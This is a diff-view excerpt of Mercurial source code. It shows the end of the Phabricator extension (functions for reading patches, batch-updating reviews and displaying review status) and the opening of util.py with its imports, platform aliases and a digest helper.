1554 uri = b'Differential Revision: %s' % drev[b'uri']
1556 uri = b'Differential Revision: %s' % drev[b'uri']
1555 return b'\n\n'.join(filter(None, [title, summary, testplan, uri]))
1557 return b'\n\n'.join(filter(None, [title, summary, testplan, uri]))
1556
1558
1557
1559
1558 def getdiffmeta(diff):
1560 def getdiffmeta(diff):
1559 """get commit metadata (date, node, user, p1) from a diff object
1561 """get commit metadata (date, node, user, p1) from a diff object
1560
1562
1561 The metadata could be "hg:meta", sent by phabsend, like:
1563 The metadata could be "hg:meta", sent by phabsend, like:
1562
1564
1563 "properties": {
1565 "properties": {
1564 "hg:meta": {
1566 "hg:meta": {
1565 "branch": "default",
1567 "branch": "default",
1566 "date": "1499571514 25200",
1568 "date": "1499571514 25200",
1567 "node": "98c08acae292b2faf60a279b4189beb6cff1414d",
1569 "node": "98c08acae292b2faf60a279b4189beb6cff1414d",
1568 "user": "Foo Bar <foo@example.com>",
1570 "user": "Foo Bar <foo@example.com>",
1569 "parent": "6d0abad76b30e4724a37ab8721d630394070fe16"
1571 "parent": "6d0abad76b30e4724a37ab8721d630394070fe16"
1570 }
1572 }
1571 }
1573 }
1572
1574
1573 Or converted from "local:commits", sent by "arc", like:
1575 Or converted from "local:commits", sent by "arc", like:
1574
1576
1575 "properties": {
1577 "properties": {
1576 "local:commits": {
1578 "local:commits": {
1577 "98c08acae292b2faf60a279b4189beb6cff1414d": {
1579 "98c08acae292b2faf60a279b4189beb6cff1414d": {
1578 "author": "Foo Bar",
1580 "author": "Foo Bar",
1579 "authorEmail": "foo@example.com"
1581 "authorEmail": "foo@example.com"
1580 "branch": "default",
1582 "branch": "default",
1581 "commit": "98c08acae292b2faf60a279b4189beb6cff1414d",
1583 "commit": "98c08acae292b2faf60a279b4189beb6cff1414d",
1582 "local": "1000",
1584 "local": "1000",
1583 "message": "...",
1585 "message": "...",
1584 "parents": ["6d0abad76b30e4724a37ab8721d630394070fe16"],
1586 "parents": ["6d0abad76b30e4724a37ab8721d630394070fe16"],
1585 "rev": "98c08acae292b2faf60a279b4189beb6cff1414d",
1587 "rev": "98c08acae292b2faf60a279b4189beb6cff1414d",
1586 "summary": "...",
1588 "summary": "...",
1587 "tag": "",
1589 "tag": "",
1588 "time": 1499546314,
1590 "time": 1499546314,
1589 }
1591 }
1590 }
1592 }
1591 }
1593 }
1592
1594
1593 Note: metadata extracted from "local:commits" will lose time zone
1595 Note: metadata extracted from "local:commits" will lose time zone
1594 information.
1596 information.
1595 """
1597 """
1596 props = diff.get(b'properties') or {}
1598 props = diff.get(b'properties') or {}
1597 meta = props.get(b'hg:meta')
1599 meta = props.get(b'hg:meta')
1598 if not meta:
1600 if not meta:
1599 if props.get(b'local:commits'):
1601 if props.get(b'local:commits'):
1600 commit = sorted(props[b'local:commits'].values())[0]
1602 commit = sorted(props[b'local:commits'].values())[0]
1601 meta = {}
1603 meta = {}
1602 if b'author' in commit and b'authorEmail' in commit:
1604 if b'author' in commit and b'authorEmail' in commit:
1603 meta[b'user'] = b'%s <%s>' % (
1605 meta[b'user'] = b'%s <%s>' % (
1604 commit[b'author'],
1606 commit[b'author'],
1605 commit[b'authorEmail'],
1607 commit[b'authorEmail'],
1606 )
1608 )
1607 if b'time' in commit:
1609 if b'time' in commit:
1608 meta[b'date'] = b'%d 0' % int(commit[b'time'])
1610 meta[b'date'] = b'%d 0' % int(commit[b'time'])
1609 if b'branch' in commit:
1611 if b'branch' in commit:
1610 meta[b'branch'] = commit[b'branch']
1612 meta[b'branch'] = commit[b'branch']
1611 node = commit.get(b'commit', commit.get(b'rev'))
1613 node = commit.get(b'commit', commit.get(b'rev'))
1612 if node:
1614 if node:
1613 meta[b'node'] = node
1615 meta[b'node'] = node
1614 if len(commit.get(b'parents', ())) >= 1:
1616 if len(commit.get(b'parents', ())) >= 1:
1615 meta[b'parent'] = commit[b'parents'][0]
1617 meta[b'parent'] = commit[b'parents'][0]
1616 else:
1618 else:
1617 meta = {}
1619 meta = {}
1618 if b'date' not in meta and b'dateCreated' in diff:
1620 if b'date' not in meta and b'dateCreated' in diff:
1619 meta[b'date'] = b'%s 0' % diff[b'dateCreated']
1621 meta[b'date'] = b'%s 0' % diff[b'dateCreated']
1620 if b'branch' not in meta and diff.get(b'branch'):
1622 if b'branch' not in meta and diff.get(b'branch'):
1621 meta[b'branch'] = diff[b'branch']
1623 meta[b'branch'] = diff[b'branch']
1622 if b'parent' not in meta and diff.get(b'sourceControlBaseRevision'):
1624 if b'parent' not in meta and diff.get(b'sourceControlBaseRevision'):
1623 meta[b'parent'] = diff[b'sourceControlBaseRevision']
1625 meta[b'parent'] = diff[b'sourceControlBaseRevision']
1624 return meta
1626 return meta
1625
1627
1626
1628
1627 def readpatch(ui, drevs, write):
1629 def readpatch(ui, drevs, write):
1628 """generate plain-text patch readable by 'hg import'
1630 """generate plain-text patch readable by 'hg import'
1629
1631
1630 write takes a list of (DREV, bytes), where DREV is the differential number
1632 write takes a list of (DREV, bytes), where DREV is the differential number
1631 (as bytes, without the "D" prefix) and the bytes are the text of a patch
1633 (as bytes, without the "D" prefix) and the bytes are the text of a patch
1632 to be imported. drevs is what "querydrev" returns, results of
1634 to be imported. drevs is what "querydrev" returns, results of
1633 "differential.query".
1635 "differential.query".
1634 """
1636 """
1635 # Prefetch hg:meta property for all diffs
1637 # Prefetch hg:meta property for all diffs
1636 diffids = sorted(set(max(int(v) for v in drev[b'diffs']) for drev in drevs))
1638 diffids = sorted(set(max(int(v) for v in drev[b'diffs']) for drev in drevs))
1637 diffs = callconduit(ui, b'differential.querydiffs', {b'ids': diffids})
1639 diffs = callconduit(ui, b'differential.querydiffs', {b'ids': diffids})
1638
1640
1639 patches = []
1641 patches = []
1640
1642
1641 # Generate patch for each drev
1643 # Generate patch for each drev
1642 for drev in drevs:
1644 for drev in drevs:
1643 ui.note(_(b'reading D%s\n') % drev[b'id'])
1645 ui.note(_(b'reading D%s\n') % drev[b'id'])
1644
1646
1645 diffid = max(int(v) for v in drev[b'diffs'])
1647 diffid = max(int(v) for v in drev[b'diffs'])
1646 body = callconduit(ui, b'differential.getrawdiff', {b'diffID': diffid})
1648 body = callconduit(ui, b'differential.getrawdiff', {b'diffID': diffid})
1647 desc = getdescfromdrev(drev)
1649 desc = getdescfromdrev(drev)
1648 header = b'# HG changeset patch\n'
1650 header = b'# HG changeset patch\n'
1649
1651
1650 # Try to preserve metadata from hg:meta property. Write hg patch
1652 # Try to preserve metadata from hg:meta property. Write hg patch
1651 # headers that can be read by the "import" command. See patchheadermap
1653 # headers that can be read by the "import" command. See patchheadermap
1652 # and extract in mercurial/patch.py for supported headers.
1654 # and extract in mercurial/patch.py for supported headers.
1653 meta = getdiffmeta(diffs[b'%d' % diffid])
1655 meta = getdiffmeta(diffs[b'%d' % diffid])
1654 for k in _metanamemap.keys():
1656 for k in _metanamemap.keys():
1655 if k in meta:
1657 if k in meta:
1656 header += b'# %s %s\n' % (_metanamemap[k], meta[k])
1658 header += b'# %s %s\n' % (_metanamemap[k], meta[k])
1657
1659
1658 content = b'%s%s\n%s' % (header, desc, body)
1660 content = b'%s%s\n%s' % (header, desc, body)
1659 patches.append((drev[b'id'], content))
1661 patches.append((drev[b'id'], content))
1660
1662
1661 # Write patches to the supplied callback
1663 # Write patches to the supplied callback
1662 write(patches)
1664 write(patches)
1663
1665
1664
1666
1665 @vcrcommand(
1667 @vcrcommand(
1666 b'phabread',
1668 b'phabread',
1667 [(b'', b'stack', False, _(b'read dependencies'))],
1669 [(b'', b'stack', False, _(b'read dependencies'))],
1668 _(b'DREVSPEC [OPTIONS]'),
1670 _(b'DREVSPEC [OPTIONS]'),
1669 helpcategory=command.CATEGORY_IMPORT_EXPORT,
1671 helpcategory=command.CATEGORY_IMPORT_EXPORT,
1670 optionalrepo=True,
1672 optionalrepo=True,
1671 )
1673 )
1672 def phabread(ui, repo, spec, **opts):
1674 def phabread(ui, repo, spec, **opts):
1673 """print patches from Phabricator suitable for importing
1675 """print patches from Phabricator suitable for importing
1674
1676
1675 DREVSPEC could be a Differential Revision identity, like ``D123``, or just
1677 DREVSPEC could be a Differential Revision identity, like ``D123``, or just
1676 the number ``123``. It could also have common operators like ``+``, ``-``,
1678 the number ``123``. It could also have common operators like ``+``, ``-``,
1677 ``&``, ``(``, ``)`` for complex queries. Prefix ``:`` could be used to
1679 ``&``, ``(``, ``)`` for complex queries. Prefix ``:`` could be used to
1678 select a stack.
1680 select a stack.
1679
1681
1680 ``abandoned``, ``accepted``, ``closed``, ``needsreview``, ``needsrevision``
1682 ``abandoned``, ``accepted``, ``closed``, ``needsreview``, ``needsrevision``
1681 could be used to filter patches by status. For performance reason, they
1683 could be used to filter patches by status. For performance reason, they
1682 only represent a subset of non-status selections and cannot be used alone.
1684 only represent a subset of non-status selections and cannot be used alone.
1683
1685
1684 For example, ``:D6+8-(2+D4)`` selects a stack up to D6, plus D8 and exclude
1686 For example, ``:D6+8-(2+D4)`` selects a stack up to D6, plus D8 and exclude
1685 D2 and D4. ``:D9 & needsreview`` selects "Needs Review" revisions in a
1687 D2 and D4. ``:D9 & needsreview`` selects "Needs Review" revisions in a
1686 stack up to D9.
1688 stack up to D9.
1687
1689
1688 If --stack is given, follow dependencies information and read all patches.
1690 If --stack is given, follow dependencies information and read all patches.
1689 It is equivalent to the ``:`` operator.
1691 It is equivalent to the ``:`` operator.
1690 """
1692 """
1691 opts = pycompat.byteskwargs(opts)
1693 opts = pycompat.byteskwargs(opts)
1692 if opts.get(b'stack'):
1694 if opts.get(b'stack'):
1693 spec = b':(%s)' % spec
1695 spec = b':(%s)' % spec
1694 drevs = querydrev(ui, spec)
1696 drevs = querydrev(ui, spec)
1695
1697
1696 def _write(patches):
1698 def _write(patches):
1697 for drev, content in patches:
1699 for drev, content in patches:
1698 ui.write(content)
1700 ui.write(content)
1699
1701
1700 readpatch(ui, drevs, _write)
1702 readpatch(ui, drevs, _write)
1701
1703
1702
1704
1703 @vcrcommand(
1705 @vcrcommand(
1704 b'phabupdate',
1706 b'phabupdate',
1705 [
1707 [
1706 (b'', b'accept', False, _(b'accept revisions')),
1708 (b'', b'accept', False, _(b'accept revisions')),
1707 (b'', b'reject', False, _(b'reject revisions')),
1709 (b'', b'reject', False, _(b'reject revisions')),
1708 (b'', b'abandon', False, _(b'abandon revisions')),
1710 (b'', b'abandon', False, _(b'abandon revisions')),
1709 (b'', b'reclaim', False, _(b'reclaim revisions')),
1711 (b'', b'reclaim', False, _(b'reclaim revisions')),
1710 (b'm', b'comment', b'', _(b'comment on the last revision')),
1712 (b'm', b'comment', b'', _(b'comment on the last revision')),
1711 ],
1713 ],
1712 _(b'DREVSPEC [OPTIONS]'),
1714 _(b'DREVSPEC [OPTIONS]'),
1713 helpcategory=command.CATEGORY_IMPORT_EXPORT,
1715 helpcategory=command.CATEGORY_IMPORT_EXPORT,
1714 optionalrepo=True,
1716 optionalrepo=True,
1715 )
1717 )
1716 def phabupdate(ui, repo, spec, **opts):
1718 def phabupdate(ui, repo, spec, **opts):
1717 """update Differential Revision in batch
1719 """update Differential Revision in batch
1718
1720
1719 DREVSPEC selects revisions. See :hg:`help phabread` for its usage.
1721 DREVSPEC selects revisions. See :hg:`help phabread` for its usage.
1720 """
1722 """
1721 opts = pycompat.byteskwargs(opts)
1723 opts = pycompat.byteskwargs(opts)
1722 flags = [n for n in b'accept reject abandon reclaim'.split() if opts.get(n)]
1724 flags = [n for n in b'accept reject abandon reclaim'.split() if opts.get(n)]
1723 if len(flags) > 1:
1725 if len(flags) > 1:
1724 raise error.Abort(_(b'%s cannot be used together') % b', '.join(flags))
1726 raise error.Abort(_(b'%s cannot be used together') % b', '.join(flags))
1725
1727
1726 actions = []
1728 actions = []
1727 for f in flags:
1729 for f in flags:
1728 actions.append({b'type': f, b'value': True})
1730 actions.append({b'type': f, b'value': True})
1729
1731
1730 drevs = querydrev(ui, spec)
1732 drevs = querydrev(ui, spec)
1731 for i, drev in enumerate(drevs):
1733 for i, drev in enumerate(drevs):
1732 if i + 1 == len(drevs) and opts.get(b'comment'):
1734 if i + 1 == len(drevs) and opts.get(b'comment'):
1733 actions.append({b'type': b'comment', b'value': opts[b'comment']})
1735 actions.append({b'type': b'comment', b'value': opts[b'comment']})
1734 if actions:
1736 if actions:
1735 params = {
1737 params = {
1736 b'objectIdentifier': drev[b'phid'],
1738 b'objectIdentifier': drev[b'phid'],
1737 b'transactions': actions,
1739 b'transactions': actions,
1738 }
1740 }
1739 callconduit(ui, b'differential.revision.edit', params)
1741 callconduit(ui, b'differential.revision.edit', params)
1740
1742
1741
1743
1742 @eh.templatekeyword(b'phabreview', requires={b'ctx'})
1744 @eh.templatekeyword(b'phabreview', requires={b'ctx'})
1743 def template_review(context, mapping):
1745 def template_review(context, mapping):
1744 """:phabreview: Object describing the review for this changeset.
1746 """:phabreview: Object describing the review for this changeset.
1745 Has attributes `url` and `id`.
1747 Has attributes `url` and `id`.
1746 """
1748 """
1747 ctx = context.resource(mapping, b'ctx')
1749 ctx = context.resource(mapping, b'ctx')
1748 m = _differentialrevisiondescre.search(ctx.description())
1750 m = _differentialrevisiondescre.search(ctx.description())
1749 if m:
1751 if m:
1750 return templateutil.hybriddict(
1752 return templateutil.hybriddict(
1751 {b'url': m.group('url'), b'id': b"D%s" % m.group('id'),}
1753 {b'url': m.group('url'), b'id': b"D%s" % m.group('id'),}
1752 )
1754 )
1753 else:
1755 else:
1754 tags = ctx.repo().nodetags(ctx.node())
1756 tags = ctx.repo().nodetags(ctx.node())
1755 for t in tags:
1757 for t in tags:
1756 if _differentialrevisiontagre.match(t):
1758 if _differentialrevisiontagre.match(t):
1757 url = ctx.repo().ui.config(b'phabricator', b'url')
1759 url = ctx.repo().ui.config(b'phabricator', b'url')
1758 if not url.endswith(b'/'):
1760 if not url.endswith(b'/'):
1759 url += b'/'
1761 url += b'/'
1760 url += t
1762 url += t
1761
1763
1762 return templateutil.hybriddict({b'url': url, b'id': t,})
1764 return templateutil.hybriddict({b'url': url, b'id': t,})
1763 return None
1765 return None
1764
1766
1765
1767
1766 @eh.templatekeyword(b'phabstatus', requires={b'ctx', b'repo', b'ui'})
1768 @eh.templatekeyword(b'phabstatus', requires={b'ctx', b'repo', b'ui'})
1767 def template_status(context, mapping):
1769 def template_status(context, mapping):
1768 """:phabstatus: String. Status of Phabricator differential.
1770 """:phabstatus: String. Status of Phabricator differential.
1769 """
1771 """
1770 ctx = context.resource(mapping, b'ctx')
1772 ctx = context.resource(mapping, b'ctx')
1771 repo = context.resource(mapping, b'repo')
1773 repo = context.resource(mapping, b'repo')
1772 ui = context.resource(mapping, b'ui')
1774 ui = context.resource(mapping, b'ui')
1773
1775
1774 rev = ctx.rev()
1776 rev = ctx.rev()
1775 try:
1777 try:
1776 drevid = getdrevmap(repo, [rev])[rev]
1778 drevid = getdrevmap(repo, [rev])[rev]
1777 except KeyError:
1779 except KeyError:
1778 return None
1780 return None
1779 drevs = callconduit(ui, b'differential.query', {b'ids': [drevid]})
1781 drevs = callconduit(ui, b'differential.query', {b'ids': [drevid]})
1780 for drev in drevs:
1782 for drev in drevs:
1781 if int(drev[b'id']) == drevid:
1783 if int(drev[b'id']) == drevid:
1782 return templateutil.hybriddict(
1784 return templateutil.hybriddict(
1783 {b'url': drev[b'uri'], b'status': drev[b'statusName'],}
1785 {b'url': drev[b'uri'], b'status': drev[b'statusName'],}
1784 )
1786 )
1785 return None
1787 return None
1786
1788
1787
1789
1788 @show.showview(b'phabstatus', csettopic=b'work')
1790 @show.showview(b'phabstatus', csettopic=b'work')
1789 def phabstatusshowview(ui, repo, displayer):
1791 def phabstatusshowview(ui, repo, displayer):
1790 """Phabricator differiential status"""
1792 """Phabricator differiential status"""
1791 revs = repo.revs('sort(_underway(), topo)')
1793 revs = repo.revs('sort(_underway(), topo)')
1792 drevmap = getdrevmap(repo, revs)
1794 drevmap = getdrevmap(repo, revs)
1793 unknownrevs, drevids, revsbydrevid = [], set([]), {}
1795 unknownrevs, drevids, revsbydrevid = [], set([]), {}
1794 for rev, drevid in pycompat.iteritems(drevmap):
1796 for rev, drevid in pycompat.iteritems(drevmap):
1795 if drevid is not None:
1797 if drevid is not None:
1796 drevids.add(drevid)
1798 drevids.add(drevid)
1797 revsbydrevid.setdefault(drevid, set([])).add(rev)
1799 revsbydrevid.setdefault(drevid, set([])).add(rev)
1798 else:
1800 else:
1799 unknownrevs.append(rev)
1801 unknownrevs.append(rev)
1800
1802
1801 drevs = callconduit(ui, b'differential.query', {b'ids': list(drevids)})
1803 drevs = callconduit(ui, b'differential.query', {b'ids': list(drevids)})
1802 drevsbyrev = {}
1804 drevsbyrev = {}
1803 for drev in drevs:
1805 for drev in drevs:
1804 for rev in revsbydrevid[int(drev[b'id'])]:
1806 for rev in revsbydrevid[int(drev[b'id'])]:
1805 drevsbyrev[rev] = drev
1807 drevsbyrev[rev] = drev
1806
1808
1807 def phabstatus(ctx):
1809 def phabstatus(ctx):
1808 drev = drevsbyrev[ctx.rev()]
1810 drev = drevsbyrev[ctx.rev()]
1809 status = ui.label(
1811 status = ui.label(
1810 b'%(statusName)s' % drev,
1812 b'%(statusName)s' % drev,
1811 b'phabricator.status.%s' % _getstatusname(drev),
1813 b'phabricator.status.%s' % _getstatusname(drev),
1812 )
1814 )
1813 ui.write(b"\n%s %s\n" % (drev[b'uri'], status))
1815 ui.write(b"\n%s %s\n" % (drev[b'uri'], status))
1814
1816
1815 revs -= smartset.baseset(unknownrevs)
1817 revs -= smartset.baseset(unknownrevs)
1816 revdag = graphmod.dagwalker(repo, revs)
1818 revdag = graphmod.dagwalker(repo, revs)
1817
1819
1818 ui.setconfig(b'experimental', b'graphshorten', True)
1820 ui.setconfig(b'experimental', b'graphshorten', True)
1819 displayer._exthook = phabstatus
1821 displayer._exthook = phabstatus
1820 nodelen = show.longestshortest(repo, revs)
1822 nodelen = show.longestshortest(repo, revs)
1821 logcmdutil.displaygraph(
1823 logcmdutil.displaygraph(
1822 ui,
1824 ui,
1823 repo,
1825 repo,
1824 revdag,
1826 revdag,
1825 displayer,
1827 displayer,
1826 graphmod.asciiedges,
1828 graphmod.asciiedges,
1827 props={b'nodelen': nodelen},
1829 props={b'nodelen': nodelen},
1828 )
1830 )
@@ -1,3618 +1,3618 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import collections
19 import collections
20 import contextlib
20 import contextlib
21 import errno
21 import errno
22 import gc
22 import gc
23 import hashlib
23 import hashlib
24 import itertools
24 import itertools
25 import mmap
25 import mmap
26 import os
26 import os
27 import platform as pyplatform
27 import platform as pyplatform
28 import re as remod
28 import re as remod
29 import shutil
29 import shutil
30 import socket
30 import socket
31 import stat
31 import stat
32 import sys
32 import sys
33 import time
33 import time
34 import traceback
34 import traceback
35 import warnings
35 import warnings
36
36
37 from .thirdparty import attr
37 from .thirdparty import attr
38 from .pycompat import (
38 from .pycompat import (
39 delattr,
39 delattr,
40 getattr,
40 getattr,
41 open,
41 open,
42 setattr,
42 setattr,
43 )
43 )
44 from hgdemandimport import tracing
44 from hgdemandimport import tracing
45 from . import (
45 from . import (
46 encoding,
46 encoding,
47 error,
47 error,
48 i18n,
48 i18n,
49 node as nodemod,
49 node as nodemod,
50 policy,
50 policy,
51 pycompat,
51 pycompat,
52 urllibcompat,
52 urllibcompat,
53 )
53 )
54 from .utils import (
54 from .utils import (
55 compression,
55 compression,
56 hashutil,
56 hashutil,
57 procutil,
57 procutil,
58 stringutil,
58 stringutil,
59 )
59 )
60
60
61 base85 = policy.importmod('base85')
61 base85 = policy.importmod('base85')
62 osutil = policy.importmod('osutil')
62 osutil = policy.importmod('osutil')
63
63
64 b85decode = base85.b85decode
64 b85decode = base85.b85decode
65 b85encode = base85.b85encode
65 b85encode = base85.b85encode
66
66
67 cookielib = pycompat.cookielib
67 cookielib = pycompat.cookielib
68 httplib = pycompat.httplib
68 httplib = pycompat.httplib
69 pickle = pycompat.pickle
69 pickle = pycompat.pickle
70 safehasattr = pycompat.safehasattr
70 safehasattr = pycompat.safehasattr
71 socketserver = pycompat.socketserver
71 socketserver = pycompat.socketserver
72 bytesio = pycompat.bytesio
72 bytesio = pycompat.bytesio
73 # TODO deprecate stringio name, as it is a lie on Python 3.
73 # TODO deprecate stringio name, as it is a lie on Python 3.
74 stringio = bytesio
74 stringio = bytesio
75 xmlrpclib = pycompat.xmlrpclib
75 xmlrpclib = pycompat.xmlrpclib
76
76
77 httpserver = urllibcompat.httpserver
77 httpserver = urllibcompat.httpserver
78 urlerr = urllibcompat.urlerr
78 urlerr = urllibcompat.urlerr
79 urlreq = urllibcompat.urlreq
79 urlreq = urllibcompat.urlreq
80
80
81 # workaround for win32mbcs
81 # workaround for win32mbcs
82 _filenamebytestr = pycompat.bytestr
82 _filenamebytestr = pycompat.bytestr
83
83
84 if pycompat.iswindows:
84 if pycompat.iswindows:
85 from . import windows as platform
85 from . import windows as platform
86 else:
86 else:
87 from . import posix as platform
87 from . import posix as platform
88
88
89 _ = i18n._
89 _ = i18n._
90
90
91 bindunixsocket = platform.bindunixsocket
91 bindunixsocket = platform.bindunixsocket
92 cachestat = platform.cachestat
92 cachestat = platform.cachestat
93 checkexec = platform.checkexec
93 checkexec = platform.checkexec
94 checklink = platform.checklink
94 checklink = platform.checklink
95 copymode = platform.copymode
95 copymode = platform.copymode
96 expandglobs = platform.expandglobs
96 expandglobs = platform.expandglobs
97 getfsmountpoint = platform.getfsmountpoint
97 getfsmountpoint = platform.getfsmountpoint
98 getfstype = platform.getfstype
98 getfstype = platform.getfstype
99 groupmembers = platform.groupmembers
99 groupmembers = platform.groupmembers
100 groupname = platform.groupname
100 groupname = platform.groupname
101 isexec = platform.isexec
101 isexec = platform.isexec
102 isowner = platform.isowner
102 isowner = platform.isowner
103 listdir = osutil.listdir
103 listdir = osutil.listdir
104 localpath = platform.localpath
104 localpath = platform.localpath
105 lookupreg = platform.lookupreg
105 lookupreg = platform.lookupreg
106 makedir = platform.makedir
106 makedir = platform.makedir
107 nlinks = platform.nlinks
107 nlinks = platform.nlinks
108 normpath = platform.normpath
108 normpath = platform.normpath
109 normcase = platform.normcase
109 normcase = platform.normcase
110 normcasespec = platform.normcasespec
110 normcasespec = platform.normcasespec
111 normcasefallback = platform.normcasefallback
111 normcasefallback = platform.normcasefallback
112 openhardlinks = platform.openhardlinks
112 openhardlinks = platform.openhardlinks
113 oslink = platform.oslink
113 oslink = platform.oslink
114 parsepatchoutput = platform.parsepatchoutput
114 parsepatchoutput = platform.parsepatchoutput
115 pconvert = platform.pconvert
115 pconvert = platform.pconvert
116 poll = platform.poll
116 poll = platform.poll
117 posixfile = platform.posixfile
117 posixfile = platform.posixfile
118 readlink = platform.readlink
118 readlink = platform.readlink
119 rename = platform.rename
119 rename = platform.rename
120 removedirs = platform.removedirs
120 removedirs = platform.removedirs
121 samedevice = platform.samedevice
121 samedevice = platform.samedevice
122 samefile = platform.samefile
122 samefile = platform.samefile
123 samestat = platform.samestat
123 samestat = platform.samestat
124 setflags = platform.setflags
124 setflags = platform.setflags
125 split = platform.split
125 split = platform.split
126 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
126 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
127 statisexec = platform.statisexec
127 statisexec = platform.statisexec
128 statislink = platform.statislink
128 statislink = platform.statislink
129 umask = platform.umask
129 umask = platform.umask
130 unlink = platform.unlink
130 unlink = platform.unlink
131 username = platform.username
131 username = platform.username
132
132
133 # small compat layer
133 # small compat layer
134 compengines = compression.compengines
134 compengines = compression.compengines
135 SERVERROLE = compression.SERVERROLE
135 SERVERROLE = compression.SERVERROLE
136 CLIENTROLE = compression.CLIENTROLE
136 CLIENTROLE = compression.CLIENTROLE
137
137
138 try:
138 try:
139 recvfds = osutil.recvfds
139 recvfds = osutil.recvfds
140 except AttributeError:
140 except AttributeError:
141 pass
141 pass
142
142
143 # Python compatibility
143 # Python compatibility
144
144
145 _notset = object()
145 _notset = object()
146
146
147
147
148 def bitsfrom(container):
148 def bitsfrom(container):
149 bits = 0
149 bits = 0
150 for bit in container:
150 for bit in container:
151 bits |= bit
151 bits |= bit
152 return bits
152 return bits
153
153
154
154
155 # python 2.6 still have deprecation warning enabled by default. We do not want
155 # python 2.6 still have deprecation warning enabled by default. We do not want
156 # to display anything to standard user so detect if we are running test and
156 # to display anything to standard user so detect if we are running test and
157 # only use python deprecation warning in this case.
157 # only use python deprecation warning in this case.
158 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
158 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
159 if _dowarn:
159 if _dowarn:
160 # explicitly unfilter our warning for python 2.7
160 # explicitly unfilter our warning for python 2.7
161 #
161 #
162 # The option of setting PYTHONWARNINGS in the test runner was investigated.
162 # The option of setting PYTHONWARNINGS in the test runner was investigated.
163 # However, module name set through PYTHONWARNINGS was exactly matched, so
163 # However, module name set through PYTHONWARNINGS was exactly matched, so
164 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
164 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
165 # makes the whole PYTHONWARNINGS thing useless for our usecase.
165 # makes the whole PYTHONWARNINGS thing useless for our usecase.
166 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
166 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
167 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
167 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
168 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
168 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
169 if _dowarn and pycompat.ispy3:
169 if _dowarn and pycompat.ispy3:
170 # silence warning emitted by passing user string to re.sub()
170 # silence warning emitted by passing user string to re.sub()
171 warnings.filterwarnings(
171 warnings.filterwarnings(
172 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
172 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
173 )
173 )
174 warnings.filterwarnings(
174 warnings.filterwarnings(
175 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
175 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
176 )
176 )
177 # TODO: reinvent imp.is_frozen()
177 # TODO: reinvent imp.is_frozen()
178 warnings.filterwarnings(
178 warnings.filterwarnings(
179 'ignore',
179 'ignore',
180 'the imp module is deprecated',
180 'the imp module is deprecated',
181 DeprecationWarning,
181 DeprecationWarning,
182 'mercurial',
182 'mercurial',
183 )
183 )
184
184
185
185
186 def nouideprecwarn(msg, version, stacklevel=1):
186 def nouideprecwarn(msg, version, stacklevel=1):
187 """Issue an python native deprecation warning
187 """Issue an python native deprecation warning
188
188
189 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
189 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
190 """
190 """
191 if _dowarn:
191 if _dowarn:
192 msg += (
192 msg += (
193 b"\n(compatibility will be dropped after Mercurial-%s,"
193 b"\n(compatibility will be dropped after Mercurial-%s,"
194 b" update your code.)"
194 b" update your code.)"
195 ) % version
195 ) % version
196 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
196 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
197
197
198
198
199 DIGESTS = {
199 DIGESTS = {
200 b'md5': hashlib.md5,
200 b'md5': hashlib.md5,
201 b'sha1': hashutil.sha1,
201 b'sha1': hashutil.sha1,
202 b'sha512': hashlib.sha512,
202 b'sha512': hashlib.sha512,
203 }
203 }
204 # List of digest types from strongest to weakest
204 # List of digest types from strongest to weakest
205 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
205 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
206
206
207 for k in DIGESTS_BY_STRENGTH:
207 for k in DIGESTS_BY_STRENGTH:
208 assert k in DIGESTS
208 assert k in DIGESTS
209
209
210
210
211 class digester(object):
211 class digester(object):
212 """helper to compute digests.
212 """helper to compute digests.
213
213
214 This helper can be used to compute one or more digests given their name.
214 This helper can be used to compute one or more digests given their name.
215
215
216 >>> d = digester([b'md5', b'sha1'])
216 >>> d = digester([b'md5', b'sha1'])
217 >>> d.update(b'foo')
217 >>> d.update(b'foo')
218 >>> [k for k in sorted(d)]
218 >>> [k for k in sorted(d)]
219 ['md5', 'sha1']
219 ['md5', 'sha1']
220 >>> d[b'md5']
220 >>> d[b'md5']
221 'acbd18db4cc2f85cedef654fccc4a4d8'
221 'acbd18db4cc2f85cedef654fccc4a4d8'
222 >>> d[b'sha1']
222 >>> d[b'sha1']
223 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
